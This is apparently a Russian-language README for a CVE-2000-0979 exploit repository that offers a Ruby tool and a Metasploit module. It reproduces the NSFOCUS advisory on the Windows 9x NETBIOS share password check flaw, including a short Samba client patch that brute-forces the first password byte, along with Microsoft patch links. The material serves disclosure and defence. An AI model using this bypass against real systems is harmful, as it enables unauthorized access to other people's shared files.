
CVE-2000-0979
CVE-2000-0979.rb — это автономный инструмент для эксплуатации CVE-2000-0979 против службы SMB Windows 95.
msf_2000_0979.rb — это модуль Metasploit. Вы можете скопировать его в metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

Более подробная документация появится в ближайшее время!
Уведомление безопасности NSFOCUS (SA2000-05)
Тема: Уязвимость проверки пароля NETBIOS в Microsoft Windows 9x
Дата выпуска: 24 августа 2000 г. Дата обновления: 11 октября 2000 г.
Уязвимость существует в схеме проверки пароля, используемой в реализации протокола NETBIOS Microsoft Windows 9x. Эта уязвимость позволяет любому пользователю получить доступ к службе общих файлов Windows 9x с защитой паролем. Злоумышленнику не нужно знать пароль общего ресурса.
Вы можете установить пароль для защиты общих ресурсов системы Microsoft Windows 9x. Но существует уязвимость в схеме проверки пароля, используемой в реализации протокола NETBIOS Microsoft Windows 9x. Для проверки пароля длина пароля зависит от длины данных, отправленных от клиента к серверу. То есть, если клиент устанавливает длину пароля в один байт и отправляет пакет с паролем в открытом виде на сервер, сервер сравнит его только с первым байтом общего пароля (в открытом виде), и если они совпадут, процесс проверки считается завершенным. Все, что нужно злоумышленнику, — это угадать и попробовать первый байт пароля на жертве. Система удаленного управления Windows 9x также уязвима, поскольку использует тот же метод аутентификации общего пароля.
Вот простой пример, демонстрирующий эту ошибку. Получите исходный пакет Samba и измените source/client/client.c следующим образом:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Закройте общую службу файлов и принтеров Microsoft.
Microsoft была проинформирована и выпустила бюллетень безопасности, касающийся этой ошибки.
Бюллетень доступен по адресу:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
Исправления доступны по адресу:
. Microsoft Windows 95
Исправление будет доступно в ближайшее время
. Microsoft Windows 98 и 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
ПРЕДОСТАВЛЕННАЯ ИНФОРМАЦИЯ ПУБЛИКУЕТСЯ NSFOCUS «КАК ЕСТЬ» БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ. NSFOCUS ОТКАЗЫВАЕТСЯ ОТ ВСЕХ ГАРАНТИЙ, ЯВНЫХ ИЛИ ПОДРАЗУМЕВАЕМЫХ, ЗА ИСКЛЮЧЕНИЕМ ГАРАНТИИ ТОВАРНОЙ ПРИГОДНОСТИ. НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ NSFOCUS НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБЫЕ УБЫТКИ, ВКЛЮЧАЯ ПРЯМЫЕ, КОСВЕННЫЕ, СЛУЧАЙНЫЕ, ПОСЛЕДУЮЩИЕ, ПОТЕРЮ ПРИБЫЛИ ИЛИ СПЕЦИАЛЬНЫЕ УБЫТКИ, ДАЖЕ ЕСЛИ NSFOCUS БЫЛА УВЕДОМЛЕНА О ВОЗМОЖНОСТИ ТАКИХ УБЫТКОВ. РАСПРОСТРАНЕНИЕ ИЛИ ВОСПРОИЗВЕДЕНИЕ ИНФОРМАЦИИ ДОПУСКАЕТСЯ ПРИ УСЛОВИИ, ЧТО УВЕДОМЛЕНИЕ НЕ БЫЛО ИЗМЕНЕНО КАКИМ-ЛИБО ОБРАЗОМ.
?Copyright 1999-2000 NSFOCUS. Все права защищены. Условия использования.
Команда безопасности NSFOCUS [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)